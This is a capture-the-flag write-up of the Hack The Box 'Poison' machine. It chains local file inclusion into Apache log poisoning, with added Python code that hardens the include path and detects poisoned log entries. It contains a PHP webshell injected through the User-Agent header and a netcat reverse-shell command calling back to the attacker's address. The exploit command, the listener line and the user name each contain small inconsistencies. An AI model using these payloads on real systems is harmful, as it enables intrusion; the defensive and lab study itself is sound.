Log Poisoning
LFI can lead to many exploitation techniques to gain a foothold on a target system.
Since the web server is running Apache, I will be conducting log poisoning.
The target system is FreeBSD.
A quick Google search reveals that the Apache log files on FreeBSD are located at the following paths by default:
- /var/log/httpd-access.log for access
- /var/log/httpd-error.log for error
I can check this.
The access log.
The error log.
It’s confirmed.
Injecting Poison
┌──(kali㉿kali)-[~/archive/htb/labs/poison]
└─$ curl http://$IP/ -A '<?php system($_GET['cmd']); ?>'
I will just put a PHP webshell into the User-Agent header.
It would look like this on Burp Suite.
Because of the LFI, that PHP webshell will be executed when the poisoned access log is included.
As shown above, I have code execution.
All I need to do now is call a reverse shell.
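The root cause that makes this chain possible is an include of a user-controlled file parameter. The following is an added example (not code from the original writeup and not the Poison box's browse.php) showing, in Python, how a file parameter should be resolved before anything is included: absolute paths, traversal out of the document root, scheme-like input and non-content files are all refused, which is exactly what stops a log file from ever being pulled in. The document root and the allowlisted extensions are assumptions for the example.

```python
from posixpath import join, normpath
from pathlib import PurePosixPath
from typing import Optional

# Assumed document root and allowlist for this example (constructed values,
# not taken from the target); a real application sets its own.
WEB_ROOT = "/usr/local/www/apache24/data"
ALLOWED_SUFFIXES = {".html", ".txt", ".md"}


def resolve_requested_file(requested: str, web_root: str = WEB_ROOT) -> Optional[str]:
    """Map a user-supplied ``file`` parameter to a path the server may include.

    Returns the absolute path on success, or None when the request must be
    refused. Each rejection below closes one route from an LFI to log
    poisoning: absolute paths such as /var/log/httpd-access.log, traversal out
    of the document root, wrapper/URL style input, and non-content files.
    """
    # Empty input and embedded NUL bytes are never legitimate page names.
    if not requested or "\x00" in requested:
        return None
    # Absolute paths would let the caller name any file on the system.
    if requested.startswith("/"):
        return None
    # Anything with a scheme separator is treated as a wrapper/URL, not a page.
    if ":" in requested:
        return None
    # Normalise "docs/../notes.txt" style input, then confirm the result is
    # still strictly inside the document root; because the check runs on the
    # normalised path, "../" sequences cannot escape it.
    root = web_root.rstrip("/")
    candidate = normpath(join(root, requested))
    if not candidate.startswith(root + "/"):
        return None
    # Only include files whose extension marks them as page content; log files
    # and other non-content files are refused even if they sit under the root.
    if PurePosixPath(candidate).suffix.lower() not in ALLOWED_SUFFIXES:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample requests: the first two are legitimate, the rest are
    # the kinds of values an LFI-to-log-poisoning attempt relies on.
    for value in ("info.html", "docs/../notes.txt",
                  "/var/log/httpd-access.log",
                  "../../../../var/log/httpd-access.log",
                  "httpd-access.log"):
        print(repr(value), "->", resolve_requested_file(value))
```

On a real filesystem the candidate should additionally be canonicalised with realpath() before the prefix check so that a symlink under the document root cannot point back at a log file; in the PHP application this writeup targets, the equivalent is realpath() plus a prefix check against the document root instead of passing $_GET['file'] straight to include().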
Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/poison]
└─$ curl 'http://10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=view-source:http://10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=mkfifo%20%2Ftmp%2Fbkjtjz%3B%20nc%2010.10.14.10%209999%200%3C%2Ftmp%2Fbkjtjz%20%7C%20%2Fbin%2Fsh%20%3E%2Ftmp%2Fbkjtjz%202%3E%261%3B%20rm%20%2Ftmp%2Fbkjtjz'
Sending the payload via curl.
┌──(kali㉿kali)-[~/archive/htb/labs/poison]
└─$ nnc 9999      
listening on [any] 9999 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.84] 52363
whoami
www
hostname
Poison
ifconfig
le0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
	options=8<VLAN_MTU>
	ether 00:50:56:b9:ae:36
	hwaddr 00:50:56:b9:ae:36
	inet 10.10.10.84 netmask 0xffffff00 broadcast 10.10.10.255 
	nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
	media: Ethernet autoselect
	status: active
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> metric 0 mtu 16384
	options=600003<RXCSUM,TXCSUM,RXCSUM_IPV6,TXCSUM_IPV6>
	inet6 ::1 prefixlen 128 
	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2 
	inet 127.0.0.1 netmask 0xff000000 
	nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>
	groups: lo
Initial foothold established on the target system as www-data via log poisoning.
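Everything in this chain leaves a trace in the very file that was abused: the poisoned entry carries a PHP open tag in the User-Agent, and the triggering request names the log file in the file parameter. The following is an added detection example (not part of the original writeup) that parses Apache combined-format lines, flags both patterns, and correlates them per client address. The sample log lines are constructed, modelled on the requests shown in this writeup; the timestamps and sizes are made up, and the per-IP correlation is an assumption of the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format:
# host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A PHP open tag in any logged field means the line would execute if the log
# file were ever passed to include().
PHP_TAG_RE = re.compile(r"<\?(php\b|=)", re.IGNORECASE)
# Parameter values that name a log file or climb directories with "../".
LOG_PATH_RE = re.compile(r"/var/log/|httpd-(access|error)\.log|(^|/)\.\./", re.IGNORECASE)

# Constructed sample log, modelled on the requests in this writeup. Line 1 is
# the poisoned entry, lines 2 and 3 are the LFI requests that would trigger
# it, line 4 is ordinary traffic from another client.
SAMPLE_LINES = [
    '10.10.14.10 - - [01/Jan/2024:12:00:01 +0000] "GET / HTTP/1.1" 200 289 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '10.10.14.10 - - [01/Jan/2024:12:00:07 +0000] "GET /browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=whoami HTTP/1.1" 200 512 "-" "curl/8.5.0"',
    '10.10.14.10 - - [01/Jan/2024:12:00:09 +0000] "GET /browse.php?file=..%2F..%2F..%2Fvar%2Flog%2Fhttpd-access.log HTTP/1.1" 200 512 "-" "curl/8.5.0"',
    '192.0.2.7 - - [01/Jan/2024:12:01:00 +0000] "GET /browse.php?file=ini.html HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
]


def analyse_match(m: "re.Match[str]") -> list:
    """Return the list of findings for one parsed log line."""
    findings = []
    # Header-derived fields and the raw request target are checked for PHP
    # tags; the target is URL-decoded first so an encoded tag is caught too.
    for field in ("ua", "referer", "target"):
        if PHP_TAG_RE.search(unquote(m[field])):
            findings.append(f"php_tag_in_{field}")
    # Each query parameter is checked for a log-file path or traversal
    # sequence (parse_qsl URL-decodes the values).
    for key, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        if LOG_PATH_RE.search(value):
            findings.append(f"log_file_reference_in_param:{key}")
    return findings


def scan_log(lines):
    """Return (per_line, chains).

    per_line: one (client_ip, findings) tuple per input line.
    chains:   client IPs that first planted a PHP tag in the log and later
              requested a log file through a parameter, i.e. the complete
              log-poisoning sequence seen from the same source address.
    """
    per_line, planted, chains = [], set(), set()
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if m is None:
            per_line.append(("-", ["unparseable_line"]))
            continue
        findings = analyse_match(m)
        ip = m["ip"]
        if any(f.startswith("php_tag_in_") for f in findings):
            planted.add(ip)
        if ip in planted and any(f.startswith("log_file_reference") for f in findings):
            chains.add(ip)
        per_line.append((ip, findings))
    return per_line, chains


if __name__ == "__main__":
    per_line, chains = scan_log(SAMPLE_LINES)
    for ip, findings in per_line:
        print(ip, findings or "clean")
    print("poisoning chains from:", sorted(chains))
```

To run it against a live server, pass the open log file (for example open("/var/log/httpd-access.log")) to scan_log instead of SAMPLE_LINES. Each finding is worth an alert on its own: the poisoning request and the triggering request may come from different addresses, so the per-IP chain set is a convenience for triage, not the only signal.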